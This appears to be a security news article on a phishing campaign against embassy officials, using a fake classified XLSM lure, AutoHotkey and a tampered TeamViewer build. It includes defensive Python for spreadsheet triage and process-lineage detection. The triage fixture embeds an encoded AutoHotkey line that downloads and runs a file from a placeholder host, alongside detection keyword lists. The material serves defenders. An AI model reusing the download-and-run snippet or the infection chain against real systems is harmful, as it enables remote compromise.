A recent cyberattack campaign employed a weaponized version of TeamViewer and malware disguised as a top secret US government document to target officials in several embassies in Europe.
The malware, phishing documents, and other artifacts used in the attacks all appear to be the work of a single individual using the handle EvaPiks, who has been active on a Russian-language carding forum for some time. What is still not clear is whether that same individual is also carrying out the attacks alone, or whether others are involved, according to researchers at Check Point Software Technologies, who spotted the attacks.
“According to our findings, we can tell that EvaPiks is behind the development of the entire infection chain,” says Lotem Finkelsteen, threat intelligence group manager at Check Point.
But the type of victims being targeted, and the multiple-stage nature of the attacks, are more indicative of nation-sponsored actors or sophisticated cyber groups, he says.
“Therefore, we wonder whether he joined others to carry [these] attacks, or he just tunneled others’ attack through his successful infection chain,” using an attack-as-a-service model, Finkelsteen says.
Embassy officials from at least seven countries have been targeted so far: Italy, Kenya, Bermuda, Nepal, Guyana, Lebanon, and Liberia. In each instance, the targeted individuals appear to have been carefully selected and held government revenue-related roles or positions tied to the financial sector, suggesting a possible financial motive.
So far, though, there is no evidence of the attacker attempting to gain access to any bank accounts belonging to the targeted governments, Finkelsteen says. Espionage is another possible explanation, but it is hard to tell whether there are geopolitical motives based solely on the list of countries and victims targeted, he notes.
TeamViewer itself is a legitimate remote desktop sharing and remote access tool that is widely used around the world; the campaign abuses a tampered build of it rather than any flaw in the product.
The motive behind the attacks is still unclear, but researchers believe financial theft is the most likely primary objective.
The research also ties the suspected attacker to Russian-speaking circles on the basis of Cyrillic artifacts left in the tooling.
The attacks reportedly started on April 1, and multiple embassies have been targeted since. Check Point's threat intelligence group manager Lotem Finkelsteen stated that:
“The targets were victimized that day, and then the threat actors moved step by step through a multistaged infection chain to further stages until they gained full remote access to the infected devices.”
In this campaign the initial lure is an XLSM spreadsheet containing malicious macros, sent by email under the subject "Military Financing Program" and dressed up as a classified US government document. The file has been carefully crafted: it bears the authentic logo of the US Department of State and is marked "top secret." The weaponized TeamViewer build is not in the attachment itself; it is fetched in a later stage once the macros run.
Document used by hackers to spread the malware – Image credit: Check Point
Users must disable macros!
As soon as the macros are enabled, two files are extracted from encoded cells inside the XLSM document. One is a legitimate, unmodified AutoHotkey interpreter; the other is a malicious AutoHotkey script that the interpreter runs. The script contacts the command-and-control (C&C) server, downloads the weaponized TeamViewer build and executes it, at which point the attacker has remote access to the infected device. Because both the AutoHotkey binary and TeamViewer are signed, legitimate software, the chain looks far more benign to users and to simple file-reputation checks than a dropped custom executable would.
The weaponized TeamViewer can also fetch and run additional commands from the C&C server, for example to hide the TeamViewer interface so the victim does not notice the session, or to write the TeamViewer session credentials to a text file that the attacker can retrieve.
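The "payload hidden in encoded cells" technique described above is something a triage script can look for without opening the workbook in Excel: an XLSM is a zip archive, the macro project lives in `xl/vbaProject.bin`, and cell text sits in `xl/worksheets/*.xml` or `xl/sharedStrings.xml`. The following is an added example, not code from the original article or from Check Point; it builds a constructed sample workbook in memory (with hypothetical hex- and base64-encoded blobs standing in for the two dropped files) and then triages it. The encoding formats, thresholds and the AutoHotkey keyword list are assumptions for illustration.

```python
import base64
import io
import re
import xml.etree.ElementTree as ET
import zipfile

# SpreadsheetML namespace used for both worksheets and the shared-string table.
NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}
# Assumed thresholds: no legitimate cell text is a 400+ digit hex run or a 200+ char base64 run.
HEX_RE = re.compile(r"^[0-9A-Fa-f]{400,}$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{200,}={0,2}$")
# Assumed AutoHotkey markers; UrlDownloadToFile/Run are real AHK commands.
AHK_MARKERS = (b"urldownloadtofile", b"#noenv", b"autohotkey", b"\nrun,")


def build_sample_xlsm() -> bytes:
    """Constructed sample: a minimal OOXML workbook with a VBA project and a sheet
    whose cells hold an encoded PE stub and an encoded AutoHotkey script (both fake)."""
    fake_pe = (b"MZ" + b"\x90" * 300).hex()                       # hex-encoded "executable"
    fake_ahk = base64.b64encode(
        b"#NoEnv\nUrlDownloadToFile, http://c2.invalid/tv.bin, %Temp%\\tv.bin\n"
        b"Run, %Temp%\\tv.bin\n".ljust(300, b" ")).decode()        # base64-encoded "script"
    sheet = f"""<?xml version="1.0" encoding="UTF-8"?>
<worksheet xmlns="{NS['m']}"><sheetData>
 <row r="1"><c r="A1" t="inlineStr"><is><t>Military Financing Program</t></is></c></row>
 <row r="2"><c r="A2" t="inlineStr"><is><t>{fake_pe}</t></is></c></row>
 <row r="3"><c r="A3" t="inlineStr"><is><t>{fake_ahk}</t></is></c></row>
</sheetData></worksheet>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 64)  # OLE magic + padding
        z.writestr("xl/worksheets/sheet1.xml", sheet)
    return buf.getvalue()


def decode_cell(text: str):
    """Return the decoded bytes if the cell looks like an encoded blob, else None.
    Hex is checked first because every hex string also satisfies the base64 alphabet."""
    s = text.strip()
    if HEX_RE.match(s):
        return bytes.fromhex(s)
    if B64_RE.match(s):
        return base64.b64decode(s)
    return None


def classify(blob: bytes) -> str:
    """Cheap content check on a decoded blob: PE header or AutoHotkey-looking text."""
    if blob[:2] == b"MZ":
        return "pe_executable"
    low = blob.lower()
    if any(m in low for m in AHK_MARKERS):
        return "autohotkey_script"
    return "unknown"


def triage_xlsm(data: bytes) -> dict:
    """Report whether the workbook carries a VBA project and which cells hold encoded blobs."""
    findings = {"has_vba": False, "encoded_cells": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        findings["has_vba"] = any(n.lower().endswith("vbaproject.bin") for n in names)
        parts = [n for n in names
                 if (n.startswith("xl/worksheets/") and n.endswith(".xml"))
                 or n == "xl/sharedStrings.xml"]
        for part in parts:
            root = ET.fromstring(z.read(part))
            for t in root.iterfind(".//m:t", NS):       # <t> holds inline and shared strings
                blob = decode_cell(t.text or "")
                if blob is not None:
                    findings["encoded_cells"].append(
                        {"part": part, "bytes": len(blob), "kind": classify(blob)})
    return findings


if __name__ == "__main__":
    print(triage_xlsm(build_sample_xlsm()))
```

A macro-enabled workbook is not malicious by itself; the combination that matters here is a VBA project plus cells whose only content is a long encoded blob that decodes to a PE image or a script. Real samples may split the blob across many cells or use a custom encoding, so treat this as a first-pass filter rather than a verdict.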
Infection chain of the malware – Image credit: Check Point
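Because every stage of the chain above is a signed, legitimate binary, file reputation alone will not catch it; what stands out is the process lineage (a spreadsheet spawning AutoHotkey, which then launches TeamViewer from a temp folder). The following is an added example, not code from the article or from Check Point: it walks constructed Sysmon-style process-creation events (Event ID 1 reduced to a few fields) and flags children of an Office host that are either known staging or remote-access tools or run from a user-writable path. The field names follow Sysmon's Image/ParentProcessGuid naming; the tool list and path list are assumptions to be tuned per environment.

```python
import json
import ntpath

OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Assumed watch-list: AutoHotkey interpreter names and the TeamViewer executable.
STAGE_TOOLS = {"autohotkey.exe", "autohotkeyu32.exe", "autohotkeyu64.exe", "teamviewer.exe"}
# Assumed user-writable locations from which signed tools should not normally launch.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")

# Constructed sample log: one infection chain (E -> X -> A -> T) plus two benign launches
# (B: TeamViewer from Program Files under Explorer; S: Excel spawning the print helper).
# GUIDs link child to parent so PID reuse cannot mislead the ancestry walk.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"ProcessGuid": "E", "ParentProcessGuid": None,
     "Image": r"C:\Windows\explorer.exe"},
    {"ProcessGuid": "X", "ParentProcessGuid": "E",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"},
    {"ProcessGuid": "A", "ParentProcessGuid": "X",
     "Image": r"C:\Users\u\AppData\Local\Temp\AutoHotkeyU32.exe"},
    {"ProcessGuid": "T", "ParentProcessGuid": "A",
     "Image": r"C:\Users\u\AppData\Local\Temp\TeamViewer\TeamViewer.exe"},
    {"ProcessGuid": "B", "ParentProcessGuid": "E",
     "Image": r"C:\Program Files\TeamViewer\TeamViewer.exe"},
    {"ProcessGuid": "S", "ParentProcessGuid": "X",
     "Image": r"C:\Windows\splwow64.exe"},
])


def parse_events(text: str) -> list:
    """One JSON object per line, as a Sysmon-to-JSON shipper would emit."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def ancestry(procs: dict, guid) -> list:
    """Image basenames from the process itself up to the root; cycle-safe."""
    chain, seen = [], set()
    while guid in procs and guid not in seen:
        seen.add(guid)
        ev = procs[guid]
        chain.append(ntpath.basename(ev["Image"]).lower())
        guid = ev.get("ParentProcessGuid")
    return chain


def detect(events: list) -> list:
    """Flag processes that descend from an Office host and are either a watched tool
    or launched from a user-writable directory. Returns alerts in log order."""
    procs = {e["ProcessGuid"]: e for e in events}
    alerts = []
    for e in events:
        chain = ancestry(procs, e["ProcessGuid"])
        if not any(p in OFFICE_HOSTS for p in chain[1:]):
            continue                                  # no Office ancestor: out of scope
        image_lc, path_lc = chain[0], e["Image"].lower()
        reasons = []
        if image_lc in STAGE_TOOLS:
            reasons.append("watched staging/remote-access tool under an Office ancestor")
        if any(d in path_lc for d in USER_WRITABLE):
            reasons.append("executable launched from a user-writable path")
        if reasons:
            alerts.append({"guid": e["ProcessGuid"],
                           "image": ntpath.basename(e["Image"]),
                           "chain": chain, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in detect(parse_events(SAMPLE_LOG)):
        print(a["image"], "<-", " <- ".join(a["chain"][1:]), "|", "; ".join(a["reasons"]))
```

The rule deliberately ignores TeamViewer started by Explorer from Program Files, and Excel's legitimate helper processes, so it does not fire on normal remote-support use. In the campaign described here, the signal is the lineage and the launch directory, not the binary itself.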
Check Point researchers suggest in their blog post that, considering the victims targeted and the multi-stage nature of the campaign, it is quite possible that either nation-sponsored hackers or some very sophisticated cybercriminals are involved.
In every attack, the targets were selected quite carefully, and each individual was connected to the government’s revenue-related responsibilities or the financial sector. However, so far there is no evidence of the attacker trying to access the targeted governments’ bank accounts.
Cyber espionage therefore remains the other plausible motive.
Researchers are not ruling out geopolitical motives as the main driver either. Whatever the motive, the practical defences are the same: keep macros disabled by default and never enable them in a document from an unexpected sender, treat a TeamViewer or AutoHotkey process spawned by an Office application as suspicious, run a reputable anti-malware product, and keep systems patched.